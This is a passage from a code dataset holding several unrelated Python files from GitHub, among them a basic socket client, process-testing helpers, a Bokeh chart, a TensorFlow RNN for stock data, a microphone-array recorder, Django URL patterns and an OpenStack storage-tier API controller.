List.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"15646195822","text":"import socket\n\ndef init_server(server_address):\n socket_server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n try:\n print(\"[*] Client is trying to connect at {}:{}\".format(server_address[0], server_address[1]))\n socket_server.connect(server_address)\n except socket.error as serr:\n print(\"unable to connect {}\".format(serr))\n socket_server.close()\n\n print(\"[*] Client has successfuly connected at {}:{}\".format(server_address[0],server_address[1]))\n\n recv_all(socket_server)\n\ndef recv_all(socket_server):\n MAX_RECV=1024\n command = input(\"type: \")\n try:\n\n socket_server.send(command.encode(\"utf-8\"))\n\n data=socket_server.recv(MAX_RECV).decode('utf-8')\n print(\"{} \\n\".format(data))\n\n command=input(\"$~\")\n data=\"\"\n\n except KeyboardInterrupt as kerr:\n print(\"[*] You left this server\")\n\nif __name__==\"__main__\":\n init_server((\"10.10.2.223\",8080))","repo_name":"PalagesiuCezar/Networking","sub_path":"Telnet/Telnet_client.py","file_name":"Telnet_client.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"475782300","text":"import os\nimport signal\nimport sys\n\ntry:\n import subprocess\nexcept ImportError:\n HAVE_SUBPROCESS = False\n import popen2\n import select\nelse:\n HAVE_SUBPROCESS = True\n\n\n__all__ = ['APP32', 'APP64', 'pscmd', 'TestApp']\n\n\ndef can_run(file):\n \"\"\"Check if we can run a test application\n\n Returns the filename if so, False otherwise.\n \"\"\"\n if not os.path.exists(file):\n return False\n if HAVE_SUBPROCESS:\n try:\n p = subprocess.Popen([file], stdout=subprocess.PIPE)\n p.stdout.read(1)\n except OSError:\n pass\n else:\n os.kill(p.pid, signal.SIGTERM)\n p.wait()\n return file\n else:\n p = popen2.Popen3(file, True)\n rlist, wlist, xlist = select.select([p.fromchild, p.childerr], [], [])\n if p.poll() == -1:\n os.kill(p.pid, signal.SIGTERM)\n p.wait()\n stdout = p.fromchild.read()\n stderr = p.childerr.read()\n if stdout:\n return file\n# sys.stdout.write('%s not runnable, some tests will be skipped'\n# % os.path.basename(file))\n return False\n\n\nAPP32 = can_run(os.path.join(os.path.dirname(__file__), 'app32'))\nAPP64 = can_run(os.path.join(os.path.dirname(__file__), 'app64'))\n\n\ndef run(cmd):\n \"\"\"Invoke a command, return stdout\n\n This is a small helper that runs on all supported Python versions.\n `cmd` is a list of the command line arguments.\n \"\"\"\n if HAVE_SUBPROCESS:\n val = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]\n else:\n val = os.popen(' '.join(cmdl)).read()\n val = val.decode()\n return val.strip()\n\n\n# Find the ps command.\nif os.path.exists('/bin/ps'):\n PSCMD = '/bin/ps'\nelif os.path.exists('/usr/bin/ps'):\n PSCMD = '/usr/bin/ps'\nelse:\n PSCMD = None\n\n\ndef pscmd(item, pid=os.getpid()):\n \"\"\"Invoke ps -o %(item)s -p %(pid)d and return the result\"\"\"\n pscmd = PSCMD\n if item == 'sid' and os.uname()[0] == 'AIX':\n pscmd = '/usr/sysv/bin/ps'\n if item == 'sid' and os.uname()[0] == 'Darwin':\n item = 'sess'\n assert pscmd, 'ps command not found (%s), can not run test' % pscmd\n if item == 'ni' and os.uname()[0] == 'SunOS':\n item = 'nice'\n if item == 'rssize' and os.uname()[0] in ['SunOS', 'Darwin']:\n item = 'rss'\n if item == 'pgrp' and os.uname()[0] in ['SunOS', 'AIX', 'Darwin']:\n item = 'pgid'\n cmdl = [pscmd, '-o', item, '-p', str(pid)]\n if HAVE_SUBPROCESS:\n val = subprocess.Popen(cmdl, stdout=subprocess.PIPE).communicate()[0]\n else:\n val = os.popen(' '.join(cmdl)).read()\n val = val.decode()\n val = val.strip().split()[-1]\n if item == 'sess' and os.uname()[0] == 'Darwin':\n # 'ps -o sess' on Darwin returns a hex value\n val = int(val, 16)\n return val\n\n\nclass TestApp:\n \"\"\"Simple class to run test apps as subprocesses\n\n This will work on all supported python versions (as opposed to the\n subprocess module). It will also ensure that the process is\n actually running when the constructor returns.\n \"\"\"\n def __init__(self, args, env=None):\n \"\"\"Create the instance\n\n args:: Argument list as a Python list.\n env:: Environment to run in.\n \"\"\"\n self.args = args\n self.env = env\n self.pid = None\n if HAVE_SUBPROCESS:\n self.app = self._run_subprocess()\n else:\n self.app = self._run_fork()\n\n def kill(self):\n \"\"\"Kill the process\n\n Calling this more then once or on an already killed process\n does not do any harm.\n \"\"\"\n self.kill_to_zombie()\n self.wait()\n\n def kill_to_zombie(self):\n \"\"\"Kill the process, leaving it in a zombie state\n\n This does not guarantee the process is in zombie state, it\n might have been waited on somewhere else.\n \"\"\"\n try:\n os.kill(self.pid, signal.SIGTERM)\n except OSError:\n e = sys.exc_info()[1]\n if not e.errno == 3:\n raise\n\n def wait(self):\n \"\"\"Wait for the process\n\n If the process in no longer waitable, i.e. does no longer\n exist, this will return immediately.\n \"\"\"\n try:\n if hasattr(self.app, 'wait'):\n self.app.wait()\n else:\n os.waitpid(self.pid, 0)\n except OSError:\n e = sys.exc_info()[1]\n if not e.errno == 10:\n raise\n self.pid = None\n\n def _run_subprocess(self):\n app = subprocess.Popen(self.args, env=self.env, stdout=subprocess.PIPE)\n self.pid = app.pid\n app.stdout.read(1)\n return app\n\n def _run_fork(self):\n # Based on popen2.Popen3 but simplified.\n try:\n MAXFD = os.sysconf('SC_OPEN_MAX')\n except (AttributeError, ValueError):\n MAXFD = 256\n c2pread, c2pwrite = os.pipe()\n pid = os.fork()\n if pid == 0: # child\n os.dup2(c2pwrite, 1)\n for i in xrange(3, MAXFD):\n try:\n os.close(i)\n except OSError:\n pass\n try:\n if self.env is not None:\n os.execve(self.args[0], self.args, self.env)\n else:\n os.execv(self.args[0], self.args)\n finally:\n os._exit(1)\n else: # parent\n self.pid = pid\n os.close(c2pwrite)\n fromchild = os.fdopen(c2pread, 'r')\n fromchild.read(1)\n return None\n","repo_name":"apache/hawq","sub_path":"tools/bin/pythonSrc/PSI-0.3b2_gp/tests/apphelper.py","file_name":"apphelper.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"72"} +{"seq_id":"27241381649","text":"import pandas as pd\n\nfrom bokeh.plotting import figure\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row\n\ndef update_chart(attr, old, new):\n print(old)\n print(new)\n conAmnt = my_contrib.groupby([mySelect.value])['AMNT'].sum()\n \n # update x_axis of the chart\n my_bar.x_range,factors = list(conAmnt.index.values)\n \n # update columndatasource with new data\n my_cds.data = dict(c_type=conAmnt.index.values,\n tot_amt=conAmnt.values)\n \n \n# read the datafile into a dataframe\nmy_contrib = pd.read_excel('data/2017_Contributions.xlsx')\n\n# needs these for hover tools and most othet bokeh chart functionality\nfrom bokeh.models import HoverTool,ColumnDataSource,NumeralTickFormatter, Select\n\n# Add Select Widget\nmySelect = Select(title=\"summurize contributions by:\",options=['OFFICECD','C_CODE','BOROUGHCD'], value='OFFICECD')\n\n# create a groupby to analyze funds raised by contributor type\nconAmnt = my_contrib.groupby([mySelect.value])['AMNT'].sum()\n\nx_val = conAmnt.index.values\ny_val = conAmnt.values\n\n# Create a columndatasource object\nmy_cds = ColumnDataSource(data=dict(\n c_type = x_val,\n tot_amt = y_val\n))\n\n# Create Hovertool with tooltips\nmyHover = HoverTool(tooltips = [\n (\"Amnt Raised:\",\"@tot_amt{$0,0.00 a}\") \n])\n\n# Create a figure object with necessary parameter\nmy_bar = figure(x_range=x_val,\n width=600,height=400,\n x_axis_label = \"Types of contributors\", y_axis_label = \"Funds raised in $\",\n title = \"Analyzing contributions by contributor type\",\n\n tools = 'xpan,zoom_in,tap')\n\n# Bar chart should use columnDataSource as its source for data\nmy_bar.vbar(x='c_type', top='tot_amt', width=-.5, color='red',source=my_cds,\n selection_color='blue',\n nonselection_color = 'green', nonselection_alpha=0.2)\n\n\nmy_bar.yaxis.formatter = NumeralTickFormatter(format='$0,0 a')\n\n# Add the hoverTool to the plot figure\nmy_bar.add_tools(myHover)\n\n# Capture Select on_change event\nmySelect.on_change('value',update_chart)\n\n\n# Show the bar charts and Select widget\ncurdoc().add_root(row(mySelect,my_bar))\n\n# Add title to the server application\ncurdoc().title=\"My First BokehServer Chart\"\n","repo_name":"heekyungkim-tech/Visualization_Python","sub_path":"Barchart_Server_Chart_SelectWidget.py","file_name":"Barchart_Server_Chart_SelectWidget.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74106467432","text":"\"\"\"\nRecurent Neural Network\n\nCreates python object which stores tensorflow graph.\nMakes a simple multilayer RNN, with mapping from inputs \nto hidden layers. Currently outputs just the final set of prices.\n\nBased on object oriented framework used in CS 224,\nand A. Geron's \"Hands on Machine Learning with Scikit-Learn and\nTensorflow\" Ch 14 on RNN. \nCheck those out, I stole pretty liberally from Geron.\nThe tensorflow docs are pretty rough, but the tutorials are almost\nreadable. \n\nThe input (X), and target (y) placeholders are defined in add_placeholders.\nThese are inputs to the TF graph.\n\nBefore the network can be run it should be built, which defines the graph.\n\nThe guts of the network are defined in add_prediction_op, which\nhas an input/output hidden layer to reduce dimension. \nThere is then a multilayer, dynamic RNN inside.\nThis is all defined with tensorflow intrinsics/added modules.\nCurrently, I've turned off the dropout, which should only be active\nduring training. \n\nThe training is done with batch gradient descent optimization\nvia the Adam optimizer which is an improved Gradient descent.\nIt scales gradients, includes a momentum variable).\nNote that tensorflow handles backpropagation automatically. \n\nThe loss/cost function is defined in add_loss_op, and is just \nthe mean-square error across stocks.\n\nPrediction and inference is done in predict_all()\nIn order to do prediction/inference, a model is loaded from a saved file\n(with graph defined in a Metagraph, and variables loaded via Saver).\n\nCurrently data is read in via feed_dict, which is super slow.\nApparently tf.Data is the new preferred simple framework for this.\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import fully_connected\nfrom tensorflow.contrib.rnn import MultiRNNCell, BasicRNNCell, GRUCell, LSTMCell,\\\n DropoutWrapper\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#to prevent creating huge logs.\nfrom IPython.display import clear_output\nimport time\n\nclass recurrent_NN(object):\n \"\"\"\n Make a multi-layer recurrent neural network for predicting next days\n stock data.\n\n \"\"\"\n def __init__(self,Nsteps,Ninputs,Nhidden,Noutputs,cell):\n \"\"\"\n Initialize model and build initial graph.\n\n Nsteps - number of time steps\n Ninputs - number of input stocks/features\n Nhidden - number of hidden degrees of freedom\n Noutputs - number of outputs at final time-step\n cell - type of recurrent cell to use (basic, LSTM, GRU)\n \"\"\"\n #number of outputs per input\n self.Noutputs=Noutputs\n self.Ninputs=Ninputs \n #number of steps\n self.Nsteps=Nsteps\n #number of dim on input\n self.cell_type=cell\n self.Nlayers=2\n self.Nhidden=Nhidden\n self.lr = 0.001\n self.keep_prob=0.5\n self.n_iter=200\n self.nprint=20\n self.is_training=True\n self.is_dropout=True\n #only grabbing a fraction of the data\n self.Nbatch=100\n #makes the tensor flow graph.\n self.build()\n\n def build(self):\n \"\"\"Creates essential components for graph, and \n adds variables to instance. \n \"\"\"\n tf.get_default_graph()\n tf.reset_default_graph() \n self.add_placeholders()\n self.pred = self.add_prediction_op()\n self.loss = self.add_loss_op(self.pred)\n self.train_op = self.add_training_op(self.loss)\n\n def add_placeholders(self):\n \"\"\"Adds input, output placeholders to graph. \n Note that these are python object attributes.\n \"\"\"\n #load in the training examples, and their labels\n #inputs: Nobs, with n_steps, and n_inputs per step\n self.X = tf.placeholder(tf.float32,[None,self.Nsteps,self.Ninputs],name='X')\n #Outputs: n_outputs we want to predict in the future.\n self.y = tf.placeholder(tf.float32,[None,self.Noutputs],name='y')\n\n def create_feed_dict(self,inputs_batch, labels_batch=None):\n \"\"\"Make a feed_dict from inputs, labels as inputs for \n graph.\n Args:\n inputs_batch - batch of input data\n label_batch - batch of output labels. (Can be none for prediction)\n Return:\n Feed_dict - the mapping from data to placeholders.\n \"\"\"\n feed_dict={self.X:inputs_batch}\n if labels_batch is not None:\n feed_dict[self.y]=labels_batch\n return feed_dict\n\n def make_RNN_cell(self,Nneurons,fn=tf.nn.relu):\n \"\"\"\n Returns a new cell (for deep recurrent networks), with Nneurons,\n and activation function fn.\n \"\"\"\n #Make cell type\n if self.cell_type=='basic':\n cell=BasicRNNCell(num_units=Nneurons,activation=fn)\n elif self.cell_type=='LSTM':\n cell=LSTMCell(num_units=Nneurons,activation=fn)\n elif self.cell_type=='GRU':\n cell=GRUCell(num_units=Nneurons,activation=fn)\n #only include dropout when training\n if (self.is_training & self.is_dropout):\n cell=DropoutWrapper(cell,input_keep_prob=self.keep_prob,\n variational_recurrent=True,\n input_size=Nneurons,\n dtype=tf.float32)\n return cell\n \n def add_prediction_op(self):\n \"\"\"The core model to the graph, that\n transforms the inputs into outputs.\n Implements deep neural network with relu activation.\n \"\"\"\n ##Tries to make projection to reduce dim from Ninputs to Nhidden\n stacked_inputs=tf.reshape(self.X,[-1,self.Ninputs])\n stacked_inputs=fully_connected(stacked_inputs,self.Nhidden, activation_fn=None)\n inputs_reduced= tf.reshape(stacked_inputs,[-1,self.Nsteps,self.Nhidden])\n #Make multiple cells. Note that using [cell]*n_layers did not work. This just made a copy pointing at the SAME cell in memory.\n #That led to problems with training. \n #But calling a function that returns a cell avoids that.\n cell_list=[]\n for i in range(self.Nlayers):\n cell_list.append(self.make_RNN_cell(self.Nhidden,tf.nn.leaky_relu))\n multi_cell=tf.contrib.rnn.MultiRNNCell(cell_list,state_is_tuple=True)\n rnn_outputs,states=tf.nn.dynamic_rnn(multi_cell,inputs_reduced,dtype=tf.float32)\n #use states (like CNN) since need final output state.\n #this maps the number of hidden units back to a different number.\n print(states)\n outputs = fully_connected(states,self.Noutputs,activation_fn=None)\n outputs=outputs[0]\n print(outputs)\n return outputs\n\n def add_loss_op(self,outputs):\n \"\"\"Add ops for loss to graph.\n Uses mean-square error as the loss. (Nice, differentiable)\n \"\"\"\n loss = tf.reduce_mean(tf.square(outputs-self.y)) \n return loss\n\n def add_training_op(self,loss):\n \"\"\"Create op for optimizing loss function.\n Can be passed to sess.run() to train the model.\n Return \n \"\"\"\n optimizer=tf.train.AdamOptimizer(learning_rate=self.lr)\n training_op=optimizer.minimize(loss)\n return training_op\n\n def train_on_batch(self, sess, inputs_batch, labels_batch):\n \"\"\"Perform one step of gradient descent on the provided batch of data.\n\n Args:\n sess: current tensorflow session\n input_batch: np.ndarray of shape (Nbatch, Nfeatures)\n labels_batch: np.ndarray of shape (Nbatch, 1)\n Returns:\n loss: loss over the batch (a scalar)\n \"\"\"\n feed = self.create_feed_dict(inputs_batch, labels_batch=labels_batch)\n _, loss = sess.run([self.train_op, self.loss], feed_dict=feed)\n return loss\n\n def predict_on_batch(self, sess, inputs_batch):\n \"\"\"Make predictions for the provided batch of data\n\n Args:\n sess: current tensorflow session\n input_batch: input data np.ndarray of shape (Nbatch, Nstep,Nfeatures)\n Returns:\n predictions: np.ndarray of shape (Nbatch, Nout,Nfeatures,)\n \"\"\"\n feed = self.create_feed_dict(inputs_batch)\n predictions = sess.run(self.pred, feed_dict=feed)\n\n return predictions\n\n\n # #Should use tf.Data as described in seq2seq.\n #Much faster than feed_dict according to TF docs\n \n def get_random_batch(self,X,y):\n \"\"\"get_random_batch(X,y) \n Gets multiple random samples for the data.\n Makes list of returned entries.\n Then combines together with 'stack' function at the end.\n Currently selected the next days change in stock price.\n\n X - matrix of inputs, (Nt, Ninputs)\n Y - matrix of desired outputs (Nt,Noutputs)\n\n Outputs:\n X_batch - random subset of inputs shape (Nbatch,Nsteps,Ninputs) \n y_batch - corresponding subset of outputs (Nbatch,Nsteps)\n \"\"\"\n Nt,Nin = X.shape\n x_list=[]\n y_list=[]\n for i in range(self.Nbatch):\n n0=int(np.random.random()*(Nt-self.Nsteps-1))\n n1 = n0+self.Nsteps\n x_sub = X[n0:n1]\n y_sub = y[n1]\n x_list.append(x_sub)\n y_list.append(y_sub)\n x_batch=np.stack(x_list,axis=0)\n y_batch=np.stack(y_list,axis=0)\n return x_batch,y_batch\n\n # def get_combined_data(self, ):\n # \"\"\"\n # Try to use the dataset example (following seq2seq tutorial on Tensorflow)\n # Tensorflow Does all of the splitting, lookup. \n # \"\"\"\n # # a list of strings.\n # text_batch = tf.placeholder(tf.string, shape=(self.Nbatch,))\n # dataset = tf.data.Dataset.from_tensor_slices(text_batch)\n\n # label_dataset=tf.Dataset(labels)\n \n # #Direct from TF\n # dataset = dataset.map(lambda string: tf.string_split([string]).values)\n # # dataset = dataset.map(lambda words: (words, tf.size(words)))\n # #dataset = dataset.map(lambda words, size: (table.lookup(words), size))\n # dataset=dataset.map(lambda words,size: sentence_lookup(words), tf.size(words))\n\n # #zip together\n # dataset_total=tf.data.Dataset.zip((dataset,label_dataset))\n\n # dataset=\n \n def train_graph(self,Xi,yi,save_name=None):\n \"\"\"train_graph\n Runs the deep NN on the reduced term-frequency matrix.\n \"\"\"\n self.is_training=True\n #save model and graph\n saver=tf.train.Saver()\n init=tf.global_variables_initializer()\n loss_tot=np.zeros(int(self.n_iter/self.nprint+1))\n #Try adding everything by name to a collection\n tf.add_to_collection('X',self.X)\n tf.add_to_collection('y',self.y)\n tf.add_to_collection('loss',self.loss)\n tf.add_to_collection('pred',self.pred)\n tf.add_to_collection('train',self.train_op)\n \n with tf.Session() as sess:\n init.run()\n # if (save_name!=None):\n # saver.save(sess,save_name)\n t0=time.time()\n #Use Writer for tensorboard.\n writer=tf.summary.FileWriter(\"logdir-train\",sess.graph) \n for iteration in range(self.n_iter+1):\n #select random starting point.\n X_batch,y_batch=self.get_random_batch(Xi,yi)\n current_loss=self.train_on_batch(sess, X_batch, y_batch)\n t2_b=time.time()\n if (iteration)%self.nprint ==0:\n clear_output(wait=True)\n print('iter #{}. Current MSE:{}'.format(iteration,current_loss))\n print('Total Time taken:{}'.format(t2_b-t0))\n print('\\n')\n #save the weights\n if (save_name != None):\n saver.save(sess,save_name,global_step=iteration,\n write_meta_graph=True)\n #manual logging of loss \n loss_tot[int(iteration/self.nprint)]=current_loss\n writer.close()\n #Manual plotting of loss. Writer/Tensorboard supercedes this .\n plt.figure() \n plt.plot(loss_tot)\n plt.ylabel('Error')\n plt.xlabel('Iterations x{}'.format(self.nprint))\n plt.show()\n \n\n def predict_all(self,model_name,num,input_data,reset=False):\n \"\"\"network_predict\n Load a saved Neural network, and predict the output labels\n based on input_data. Predicts the whole sequence, using\n the batching to process the data in sequence. \n \n Input: model_name - string name to where model/variables are saved.\n input_data - transformed data of shape (Nobs,Nfeature).\n\n Output nn_pred_reduced - vector of predicted labels.\n \"\"\"\n if (reset):\n tf.reset_default_graph() \n self.is_training=False\n full_model_name=model_name+'-'+str(num)\n with tf.Session() as sess:\n saver=tf.train.import_meta_graph(full_model_name+'.meta')\n #restore graph structure\n self.X=tf.get_collection('X')[0]\n self.y=tf.get_collection('y')[0]\n self.pred=tf.get_collection('pred')[0]\n self.train_op=tf.get_collection('train_op')[0]\n self.loss=tf.get_collection('loss')[0]\n #restores weights etc.\n saver.restore(sess,full_model_name)\n Nin=input_data.shape[0]\n if (Nin < self.Nbatch):\n print('Number of inputs < Number of batch expected')\n print('Padding with zeros')\n input_dat=np.append(input_dat,\n np.zeros((self.Nbatch-Nin,self.Noutputs)))\n i0=0\n i1=self.Nbatch\n nn_pred_total=np.zeros((Nin,self.Noutputs))\n while (i1 < Nin-self.Nsteps):\n print(i0,i1)\n #now treat each time, as another element in a batch.\n #(i.e. march through dataset predicting, instead of randomly selecting for training)\n X_batch=np.zeros((self.Nbatch,self.Nsteps,self.Ninputs))\n for i in range(self.Nbatch):\n X_batch[i,:,:]=input_data[(i0+i):(i0+i+self.Nsteps),:]\n nn_pred=self.predict_on_batch(sess,X_batch)\n sl=slice(self.Nsteps+i0,self.Nsteps+i1)\n nn_pred_total[sl]=nn_pred\n i0=i1\n i1+=self.Nbatch\n #last iter: do remaining operations. \n Nleft=Nin-i0-self.Nsteps\n X_batch=np.zeros((Nleft,self.Nsteps,self.Ninputs))\n for i in range(Nleft):\n X_batch[i,:,:]=input_data[(i0+i):(i0+i+self.Nsteps),:]\n nn_pred=self.predict_on_batch(sess,X_batch)\n nn_pred_total[-Nleft:]=nn_pred\n #nn_pred_reduced=np.round(nn_pred_total).astype(bool)\n return nn_pred_total\n\n \n def restore_model(self,sess,model_name,num):\n \"\"\"Attempts to reset both TF graph, and \n RNN stored variables/structure.\n \"\"\"\n saver=tf.train.import_meta_graph(model_name+'.meta')\n #restore graph structure\n self.X=tf.get_collection('X')[0]\n self.y=tf.get_collection('y')[0]\n self.pred=tf.get_collection('pred')[0]\n self.train=tf.get_collection('train')[0]\n self.loss=tf.get_collection('loss')[0]\n #restores weights etc.\n saver.restore(sess,model_name+'-'+str(num))\n \n","repo_name":"jmackrory/PDX_finance","sub_path":"neural_networks/recurrent_network.py","file_name":"recurrent_network.py","file_ext":"py","file_size_in_byte":15558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16111708485","text":"import pyaudio\nimport wave\nimport numpy as np\nimport os\nimport time\nimport scipy.io.wavfile as wav\nimport Gvoicesource\nimport shutil\nfrom multiprocessing import Process, Queue\nimport time\n\nRESPEAKER_RATE = 44100\nRESPEAKER_CHANNELS = 8 \nRESPEAKER_WIDTH = 2\n# run getDeviceInfo.py to get index\nRESPEAKER_INDEX = 2 # refer to input device id\nCHUNK = 1024\nRECORD_SECONDS = 1\nqcount = 0\n\n#\ndef save_record(WAVE_FILENAME, frames, p):\n wf = wave.open(WAVE_FILENAME, 'wb')\n # set how many channels you extract\n wf.setnchannels(1)\n wf.setsampwidth(p.get_sample_size(p.get_format_from_width(RESPEAKER_WIDTH)))\n wf.setframerate(RESPEAKER_RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n rate, mic = wav.read(WAVE_FILENAME)\n\n\ndef recording(p, WAVE_OUTPUT_FOLDNAME):\n stream = p.open(\n rate=RESPEAKER_RATE,\n format=p.get_format_from_width(RESPEAKER_WIDTH),\n channels=RESPEAKER_CHANNELS,\n input=True,\n input_device_index=RESPEAKER_INDEX,)\n\n frames1 = []\n frames2 = []\n frames3 = []\n frames4 = []\n\n for i in range(0, int(RESPEAKER_RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n # extract channel 0 data from 8 channels, if you want to extract channel 1, please change to [1::8]\n # 4 channel for microphone, 2 channels for the playback, 2 channels are not used\n mic1 = np.fromstring(data, dtype=np.int16)[0::8]\n frames1.append(mic1.tostring())\n mic2 = np.fromstring(data, dtype=np.int16)[1::8]\n frames2.append(mic2.tostring())\n mic3 = np.fromstring(data, dtype=np.int16)[2::8]\n frames3.append(mic3.tostring())\n mic4 = np.fromstring(data, dtype=np.int16)[3::8]\n frames4.append(mic4.tostring())\n\n stream.stop_stream()\n stream.close()\n\n os.mkdir(WAVE_OUTPUT_FOLDNAME)\n\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic1.wav\", frames1, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic2.wav\", frames2, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic3.wav\", frames3, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic4.wav\", frames4, p)\n\n\ndef recording_fetch(p, max_count, q):\n global qcount\n while qcount < max_count:\n recording(p, 'record' + str(qcount))\n qcount += 1\n q.put(qcount-1)\n\n\ndef detecting(WAVE_OUTPUT_FOLDNAME):\n quad, angle, distance = Gvoicesource.get_voice_source(WAVE_OUTPUT_FOLDNAME+\"//mic1.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic2.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic3.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic4.wav\")\n \n if quad != None:\n angle = round(angle, 3)\n distance = round(distance, 3)\n print(\"象限\" + str(quad), str(angle) + '°', str(distance)+'cm')\n else:\n print(\"Fail to detect...\")\n\n\nif __name__ == \"__main__\":\n p = pyaudio.PyAudio()\n q = Queue()\n max_count = 40\n recorder = Process(target=recording_fetch, args=(p, max_count, q))\n recorder.start()\n\n while True:\n i = q.get()\n if i >= max_count:\n recorder.join()\n break\n else:\n detecting('record' + str(i))\n shutil.rmtree('record' + str(i))\n\n p.terminate()\n exit()\n","repo_name":"cxyznj/VoiceDetector","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4581235903","text":"import codecs\n\ndef copy(file, new_file):\n with open(file, encoding='utf8') as file:\n data = file.read()\n with open(new_file, 'w') as n:\n n.write(data)\n\n\n# copy('story.txt','story_copy.txt')\n\ndef copy_and_reverse(filename, new_file):\n with open(filename, encoding='utf8') as file:\n data = file.read()\n\n with open(new_file, 'w') as f:\n f.write(data[::-1])\n\n\n# print(copy_and_reverse('story.txt','story_copy.txt'))\ndef statistics(filename):\n with open(filename, encoding='utf8') as file:\n # s = file.readlines()\n # print(len(s))\n data = file.read()\n line = data.split(\"\\n\")\n word = data.split()\n return {'lines': len(line), 'words': len(word), 'characters': len(data)}\n\n# print(statistics('story.txt'))\n\ndef find_and_replace(filename, word, new_word):\n with open(filename, 'r+', encoding ='utf8') as file:\n data = file.read()\n new_data = data.replace(word, new_word, data.find(word))\n file.write(new_data)\n\nfind_and_replace('story.txt', 'Alice', 'Colt')\nprint(\"Hello\")","repo_name":"Ing140943/FileIO","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32014501690","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\n\turl(r'^search$', views.search, name='search'),\n\n\t# url(r'^get_name$', views.get_name, name='get_name'),\n\n\t# url(r'^(?P[0-9]+)/$', views.detail, name='detail')\n\turl(r'^searchQuery/(?P[a-zA-Z0-9\\s]*$)', views.searchQuery, name='searchQuery'),\n\n\turl(r'^(?P[0-9]+)/vote/$', views.vote, name='vote')\n]\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()","repo_name":"tschmoek/BookSummarySearch","sub_path":"Search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70472050474","text":"import six\nimport webob\nfrom webob import exc\nfrom oslo.config import cfg\nfrom sds.common import wsgi\nfrom sds.api import xmlutil\nfrom sds.common import exception\nfrom sds.common import rpc\nfrom sds.openstack.common import log as logging\nfrom sds.discover import storage_backends\nfrom sds.discover import storage_tiers\nfrom sds.api.v1.views import tiers as views_tiers\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\ndef make_backendtype(elem):\n elem.set('id')\n elem.set('name')\n #capability_specs = xmlutil.make_flat_dict('capability_specs', selector='capability_specs')\n #elem.append(capability_specs)\n\n\nclass StorageBackendTierTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('storage_tier', selector='storage_tier')\n make_backendtype(root)\n return xmlutil.MasterTemplate(root, 1)\n\n\nclass StorageBackendTiersTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('storage_tiers')\n elem = xmlutil.SubTemplateElement(root, 'storage_tier',\n selector='storage_tiers')\n make_backendtype(elem)\n return xmlutil.MasterTemplate(root, 1)\n\n\nclass StorageBackendTiersController(wsgi.Controller):\n \"\"\"The storage backends API controller for the OpenStack API.\"\"\"\n\n _view_builder_class = views_tiers.ViewBuilder\n\n def _notify_storage_tier_error(self, context, method, payload):\n rpc.get_notifier('storageTier').error(context, method, payload)\n\n def _get_tiers(self, req, is_detail):\n \"\"\"Returns the list of storage backends.\"\"\"\n context = req.environ['sds.context']\n params = req.params.copy()\n\n search_opts = dict()\n if params:\n if params.get('id'):\n search_opts['id'] = params.get('id')\n if params.get('name'):\n search_opts['name'] = params.get('name')\n if params.get('storage_backend_id'):\n search_opts['storage_backend_id'] = params.get('storage_backend_id')\n if params.get('capability_specs_id'):\n search_opts['capability_specs_id'] = params.get('capability_specs_id')\n\n try:\n return storage_tiers.get_all_tiers(context, search_opts=search_opts, is_detail=is_detail)\n except exception.StorageTierNotFound:\n if len(search_opts) > 0: # raise exception only when specific tier info is requested\n raise\n\n return list()\n\n\n def _check_key_names(self, keys):\n if not common.validate_key_names(keys):\n expl = _('Key names can only contain alphanumeric characters, '\n 'underscores, periods, colons and hyphens.')\n\n raise webob.exc.HTTPBadRequest(explanation=expl)\n\n @wsgi.serializers(xml=StorageBackendTiersTemplate)\n def index(self, req):\n \"\"\"Returns the list of storage backends.\"\"\"\n _storage_tiers = self._get_tiers(req, is_detail = False)\n return self._view_builder.summary_list(req, _storage_tiers)\n\n @wsgi.serializers(xml=StorageBackendTiersTemplate)\n def detail(self, req):\n \"\"\"Returns the list of storage backends.\"\"\"\n _storage_tiers = self._get_tiers(req, is_detail = True)\n return self._view_builder.detail_list(req, _storage_tiers)\n\n @wsgi.serializers(xml=StorageBackendTierTemplate)\n def show(self, req, id):\n \"\"\"Return a single storage backend item.\"\"\"\n context = req.environ['sds.context']\n\n try:\n storage_tier = storage_tiers.get_tier_by_id(context, id, is_detail = True)\n except exception.NotFound:\n LOG.warn(\"Exception %s\" % 